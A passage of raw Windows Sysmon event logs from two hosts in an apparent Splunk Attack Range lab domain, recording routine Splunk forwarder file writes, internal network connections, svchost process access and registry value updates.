Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A23E207FB2B413E903D236C98DA9FF64,SHA256=69D97EAC7DD650E5B1DCEEE96C9AEFBD822726FA37C6F90810BE74596C570B5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103257Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:08.743{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FC654F4EBBE375304CEDE5DE9A96B46,SHA256=06C9CEDB010F1700C096ABDB8FB79564D1BB57A970C7AA440E36E113ADF190A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081113Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:09.990{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1129D3FC415CD6007196F23E41A19E4,SHA256=FDAD18863A47F4821673E57C6484EA36E7A31A1342D8F62D4B77ABD438CC6CAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103258Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:09.758{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9912210EDF28B84BB4F790CBF800F602,SHA256=C429A616E6043B1C0C2C2696A3B7C533C8F2C4A24099CFADE00928FC411BD8F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081114Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:10.990{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03729CE1DFCC242A06B3F86B5BBD79DB,SHA256=8C5E41C2AF90D774165AD643C5B1B84F9FE6A3CC4F9A8397828D89D8EE6195FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103260Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:10.758{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F4AF53C941103F5825AA1C7AE3EDD7F,SHA256=BFFF15B09F99C9FBF523559CCC6BF5717BA208E5348D42ECE38716625AB71A67,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103259Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:09.384{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49506-false10.0.1.12-8000- 23542300x8000000000000000103261Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:11.790{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A08B3BCF67CBD7E8306AD7F6D0B0020C,SHA256=11B8E51DFFD401D43C0F1704F40250EB743574DEE7582EF6CA3259F0DDFD31C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103264Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:12.805{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F5043C075D82647BC06D8D4BDCB6833,SHA256=702316DC6DF97F92B9945D0D3266F7201E983D9CD37874056603E5EF008B7683,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081116Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:09.558{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50006-false10.0.1.12-8000- 23542300x800000000000000081115Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:12.099{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6F79459A108FE41B4935A0B11CCBD09,SHA256=8C8B5D15247A4F5B1ACFFA0FAAC8C28EFCA27065183F312C10A1428B84666921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103263Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:12.024{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1F1042BB1CB947E0F6CE5C8DEFBD2483,SHA256=DD70ED7F19AAAF25F208AA080FCC7216C09A22B6F854B679B2427D4E1E4FFD5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103262Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:12.024{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2EE94733984D8C6F27C82590DF7F122F,SHA256=D8CA53E3D1367AFFF19CADB9259305262E8FA84549AD25BEBD36F8EDA10843CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103265Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:13.805{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B84EFCB3DD3847B6A6A49DA517926349,SHA256=8471EE3F6582157B29CBAF6B9C360C300C71BCE6384AF8E6B4FC84B63897778A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081117Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:13.209{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B525589005E856BE8DBCE6EC94D892D,SHA256=6E9CE1DFE1E1BA36B0FBE46CE792C0694627D23B61ADC4CABE75FAFEA1B14012,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103266Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:14.836{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0E17F0EA737AC2E8D8A25E105B70425,SHA256=606F604C51D4D8596AFAD5B4F3166285599936B665FFF16454BF3F5C2260A2ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081118Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:14.255{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A67F0BD1F686926E4B5D8F48DF0FA661,SHA256=D5F535CDA95CD4995C5F9424F6A47038360212591977E01481689E79397D9013,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103267Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:15.851{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB0ED114ED09C9AF2CC496A39A06BA95,SHA256=2D55A38AC490E6EFF9B0A9854EB8EF2BFA771B91C25B70B21D3B0CB181049E5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081119Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:15.318{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D864AEA76AC5BBE28AADA1EC37F4972,SHA256=ECDE394A0DF936E32A7AE9B9F4ACF2A1ABC7BB2A0E5A6E18CD2284A1E3C51A46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103268Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:16.851{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5EEAAC8FC463B2127BCEF52F4A67746,SHA256=F4D2F47FDC3993923089F575FE72684139769501A191344CD0FCB22F3C63AC66,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081121Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:14.620{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50007-false10.0.1.12-8000- 23542300x800000000000000081120Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:16.364{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5407657A310725A6865F8C524F9C4F9,SHA256=A23FDCFBBC87B42EA89BB46617D565B52415D5525DDDB683CB78820AA261E895,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103270Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:17.867{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FAE54673207D41E4F6457A7AB425720,SHA256=0AF78AEB9CE8B5B5FA489A261F1318B2AD11B0EC51204FF66F9A60E6B66B129E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081122Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:17.395{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA2A2B215B466D54316C2AFC2F4BB675,SHA256=D044FF5F6FF9AC0144165518D1C583450680CCE96951666AB81C1D1FD45B5155,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103269Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:15.415{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49507-false10.0.1.12-8000- 23542300x8000000000000000103271Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:18.869{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2E29B81DE318F26E649BED35DFF0875,SHA256=ADDFF877A0AD1D48811AB7F951D8723F6C00A30FF6432CBA6660F9147091FBE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081124Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:18.973{2FDD8D40-AC9A-615A-1200-00000000FD01}996NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=CCC137E37E9503EF621097B1B6481BBE,SHA256=8B0BC0F5FA6D7C9B637E69AD8D7C598FC30BC1006CEC7C3CC625497B49FFBD47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081123Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:18.411{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2A80DC9A42D584F4429E02AB87123FE,SHA256=7F3673026A3AC1C406375E244682294DCAD75E791D5D4ED2BB3D6A02BE5665B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103273Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:19.870{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=046A781494380C8AC0748653770DC76D,SHA256=C405A2D2C119C44F2A97AF1862E116515718EC5F14CAED55DF9C563270CBF69C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081125Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:19.473{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5450F9E894F7A66F6570E12A16EEE73,SHA256=A2119361EBBC3CC17FA7802FE1A0446D48451B93055C83E0C70E2B8CEBBA486F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103272Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:19.200{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\respondent-20211004072647-021MD5=53085563A3ABB9F3808759992432B215,SHA256=10E8415EFF195E3F3A29733AD6341E818F88D003F4EF1749654882A61D67B63B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103275Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:20.872{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=842EB633E1ABA5B8F5B7E6D7D4122DB6,SHA256=4A09C02AF9015756083036542B5FF60A94A033D20772700A8B6E315EF294BA96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081126Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:20.489{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27797621B521597732593CEAE64490F4,SHA256=F92B345422B1BD1BF4608422919B62BC6A40AD73FD93BB64C28070A8DCE78806,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103274Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:20.199{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\surveyor-20211004072645-022MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103276Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:21.888{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0D302D6B970458619D60D0A0602B959,SHA256=435234E915730E87A1667475DD628F409DA7787FEDD7A1984037019107FA3158,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081127Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:21.489{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D69DF2713FC95E2BE39177FE16CADA57,SHA256=1A2AAA17E129B10B4471E3A5DDB00CA67557445E16EE3D53B616D8A08C46CD42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103280Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:22.888{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDEB1C37D92FAAD9D08A933E1381C250,SHA256=777007F5C066C898A1DA4229E31124BC57852960177332ADE46553ADF09E07EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081129Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:22.692{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F09DF444C4329D561F87561B1429D25,SHA256=E11019C3A973C45E652145F23CB1CBA38F1CBD01BB90BC339942C6F4AD9F755D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103279Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:22.716{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-ACA7-615A-1400-00000000FC01}940C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103278Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:22.716{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-ACA7-615A-1100-00000000FC01}360C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000103277Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:21.342{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49508-false10.0.1.12-8000- 354300x800000000000000081128Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:19.666{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50008-false10.0.1.12-8000- 23542300x8000000000000000103281Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:23.903{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4826EE446FD034B50432EAA7C04E1881,SHA256=076527478C33D49DF3D1FD02EC4C597CA1EEF60B713F662D9C87022E19A60443,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081130Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:23.770{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E19B1BBAE3B788BB25CA941890D6B61B,SHA256=307234CAFE781E9303CE6A000D75E07B48EF378BF459FCB5DA625A8DAF323FC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103282Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:24.903{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8142404FF7C972D9CAD94791F8DDF1E0,SHA256=F92BD9A138B844FCB1844C47DE98370FB4AB6A63BF49A96A632BCD4D39144B80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081131Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:24.771{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8DD6905D819A3A39872493B695E8EC6,SHA256=F9F3017D84F4CE7A9DA6BBCDBBCDAED80C5EFB6E58C0720ECA32A24E57F3F716,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103283Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:25.919{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A11AA156EB4DE9EB2DC10416F12F42D,SHA256=53BAF69B4DFC84AD7EF544D18EF3801912ACCB1D3449B3FBAC1CCA0EF06FE73A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081132Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:25.786{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A04328AEDFE0717F0F2272040C0C74E,SHA256=574E1D75E0553F0056E293AE02C8C0AB456B5B525DAB569E5F0C562B1529BCA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103290Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:26.934{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4763AFE5BB1A196AC291CB606A332645,SHA256=9C82B48166480BBFA8828FCB55A690934CA8F31D4F6720FA94AB585567833039,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081134Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:26.864{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19302AEF532319B4B60AA1D35E3F08C8,SHA256=95174A670AD6F819678A2314E0669CFF8492D535C43865CCAC41C1753BEA334C,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000103289Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:49:26.559{58E9C193-ACA7-615A-1200-00000000FC01}764C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueBinary Data 13241300x8000000000000000103288Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:49:26.559{58E9C193-ACA7-615A-1200-00000000FC01}764C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueSizeDWORD (0x00000008) 13241300x8000000000000000103287Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:49:26.559{58E9C193-ACA7-615A-1200-00000000FC01}764C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\KeySizeDWORD (0x00000000) 13241300x8000000000000000103286Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:49:26.559{58E9C193-ACA7-615A-1200-00000000FC01}764C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\TimestampQWORD 